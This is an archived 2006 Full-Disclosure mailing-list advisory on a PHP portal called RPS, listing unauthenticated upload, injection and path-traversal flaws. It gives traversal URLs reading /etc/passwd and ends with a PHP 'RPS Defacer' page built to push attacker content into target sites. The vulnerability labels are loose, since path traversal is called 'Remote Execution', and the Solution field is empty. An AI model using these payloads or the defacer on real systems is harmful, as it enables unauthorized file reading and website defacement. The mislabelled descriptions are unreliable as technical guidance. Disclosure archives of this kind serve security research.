| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 18 Jul 2006 21:00:57 -0500
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@...il.com>
To: bugtraq@...urityfocus.com, bugtraq@...e-h.org, admin@...e-h.org,
full-disclosure@...ts.grok.org.uk
Cc:
Subject: Multiple Vulnerabilities RPS
###########################################################################
# Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@...sdelared.com
# Website: www.elitemexico.org
# Date: 18/07/06
# Risk: medium
# Vendor Url: http://rps.rigtersir.com/
# Affected Software: RPS
# Non Affected: RPS V 4
#
#Info:
##################################################################
#UPLOAD FILES
# it allows the user to raise archives without having administration
privileges
#
#
#SQL inyección
#it allows the user to insert post without having to be admin with this can
make xss or
#HTML injection
#
#
#example of upload files
##################################################################
#
#http://www.vuln.com/[path]/adm/photos/images.php
#
#http://www.vuln.com/[path]//adm/down/files.php
#
##################################################################
#example Remote Execution
##################################################################
#
#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd
#
#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
# v1.0, 2.0 3.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@...sdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
#Original Advisory: http://zeus.pccentervillaflores.com//13.txt
##################################################################
SQL inyección in "Articulos" exploit
<?php
/*
RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•
Date: 08/01/06
Website: www.elitemexico.org
*/
?>
<html>
<head>
<title>RPS Defacer</title>
</head>
<body text="#FFFFFF" bgcolor="#000000">
<p align="center"><font face="Verdana" size="2"><b><u><font
color="#FF0000">RPS Defacer<br>
<br>
</font>
</u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX
~•</font></b></font></p>
<form method="POST" ACTION="?action=enviar" name="rps_defacer">
<center>
<table border="0" cellpadding="5" cellspacing="0"
style="border-collapse: collapse" width="40%">
<tr>
<td width="100%"><b><font face="Verdana" size="1">Direccion:<br>
<input type="text" name="url" size="30"
value="http://"></font></b></td>
</tr>
<tr>
<td width="100%"><b><font size="1" face="Verdana">Autor:<br>
<input type="text" name="autor" size="20"></font></b></td>
</tr>
<tr>
<td width="100%"><b><font face="Verdana"><font size="1">Email:<br>
<input type="text" name="email" size="20"></font></font></b></td>
</tr>
<tr>
<td width="100%"><b><font size="1" face="Verdana">Titulo:<br>
<input type="text" name="titulo" size="30"></font></b></td>
</tr>
<tr>
<td width="100%"><b><font size="1" face="Verdana">Contenido:
(Soporta
HTML Inyection)<br>
<textarea rows="13" name="articulo"
cols="55"></textarea></font></b></td>
</tr>
<tr>
<td width="100%">
<p align="center"><b><font face="Verdana" size="1">
<input type="submit" value="Enviar" name="send">
<input type="reset" value="Restablecer"
name="delete"></font></b></td>
</tr>
</table>
</center>
</div>
</form>
<?
if($action=="enviar"){
$web= $_POST['url'];
echo "<script LANGUAGE=\"JavaScript\">
var pagina=\"$web/adm/add_art.php\"
function redireccionar()
{
location.href=pagina
}
setTimeout (\"redireccionar()\", 0001);
</script>";
}
?>
</body>
</html>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists